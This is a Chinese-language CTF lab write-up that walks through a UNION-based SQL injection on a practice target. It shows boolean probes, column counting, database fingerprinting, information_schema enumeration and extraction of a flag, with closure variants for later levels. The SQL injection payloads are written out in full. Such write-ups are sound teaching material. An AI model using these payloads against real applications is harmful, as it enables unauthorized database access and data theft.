靶场:传送门
1、验证是否存在 SQL 注入:在原 WHERE 条件后分别追加恒真的 `and 1=1` 与恒假的 `and 1=2`,两者响应有差异即说明参数被直接拼进了 SQL
-- Step 1: boolean probe. The original WHERE clause is left intact; the
-- appended tautology / contradiction only changes whether the row matches.
-- SQL1: returns the row (1=1 is always true)
SELECT * FROM user WHERE id = 1 AND 1 = 1;
-- SQL2: returns nothing (1=2 is always false)
SELECT * FROM user WHERE id = 1 AND 1 = 2;
2、验证返回字段的数量:“3”
-- Step 2: find how many columns the original SELECT returns.
-- MySQL rejects a UNION whose two SELECTs differ in column count
-- (ER_WRONG_NUMBER_OF_COLUMNS_IN_SELECT); the target renders that error as an
-- empty response, so the first payload that does return rows reveals the
-- column count -- three here.
-- SQL1: no result (1 column vs 3)
SELECT * FROM user WHERE id = 1
UNION SELECT 1 ORDER BY 2;
-- SQL2: no result (2 columns vs 3)
SELECT * FROM user WHERE id = 1
UNION SELECT 1, 2 ORDER BY 2;
-- SQL3: returns rows (3 columns, matches the original SELECT)
SELECT * FROM user WHERE id = 1
UNION SELECT 1, 2, 3 ORDER BY 2;
3、获取数据库名称:“error”,版本号:“5.6.47”
-- Step 3: fingerprint the target. The two spare union columns carry the
-- current schema name and the server version back in the response
-- (observed here: 'error' and '5.6.47').
SELECT * FROM user WHERE id = 1
UNION SELECT 1, DATABASE(), VERSION() ORDER BY 2;
4、获取数据库“error”下,所有表的名称:“error_flag,user”
-- Step 4: enumerate the tables of schema 'error'. GROUP_CONCAT() folds the
-- whole list into the single column slot of the union row.
-- Caveat: GROUP_CONCAT output is capped at @@group_concat_max_len
-- (1024 bytes by default on MySQL), so a long table list is silently cut off.
SELECT * FROM user WHERE id = 1
UNION SELECT 1,
    (SELECT GROUP_CONCAT(table_name)
     FROM information_schema.tables
     WHERE table_schema = 'error'),
    3
ORDER BY 2;
5、获取数据库表“error_flag”下,所有字段的名称:“Id,flag”
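-- Step 5: enumerate the columns of table error_flag.
-- Fix: filter on table_schema as well. information_schema.columns spans every
-- database on the server, so matching on table_name alone would merge in the
-- columns of any other schema that also has a table named error_flag and
-- misreport the layout of the one we are after.
SELECT * FROM user WHERE id = 1
UNION SELECT 1,
    (SELECT GROUP_CONCAT(column_name)
     FROM information_schema.columns
     WHERE table_schema = 'error'
       AND table_name = 'error_flag'),
    3
ORDER BY 2;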
6、获取flag:zKaQ-Nf
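-- Step 6: read the flag column.
-- Fix: GROUP_CONCAT(flag) returns every row of error_flag in one value; the
-- original `limit 1` only ever showed the first row and silently dropped the
-- rest. ORDER BY 2 matches the other payloads in this write-up.
-- Caveat: output is capped at @@group_concat_max_len (1024 bytes by default).
SELECT * FROM user WHERE id = 1
UNION SELECT 1, (SELECT GROUP_CONCAT(flag) FROM error_flag), 3
ORDER BY 2;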
告知:Pass-02、Pass-03、Pass-04 与 Pass-01 考点相同,区别只在于 id 参数在原语句中的闭合方式:注入时需先补全原语句的引号/括号,再接 union 语句,并用 `#` 或 `-- ` 注释掉原语句剩余的部分。
不同之处:
pass-01:id = 1      (数字型,无需闭合)
pass-02:id = '1'    (单引号闭合)
pass-03:id = ('1')  (单引号 + 括号闭合)
pass-04:id = ("1")  (双引号 + 括号闭合)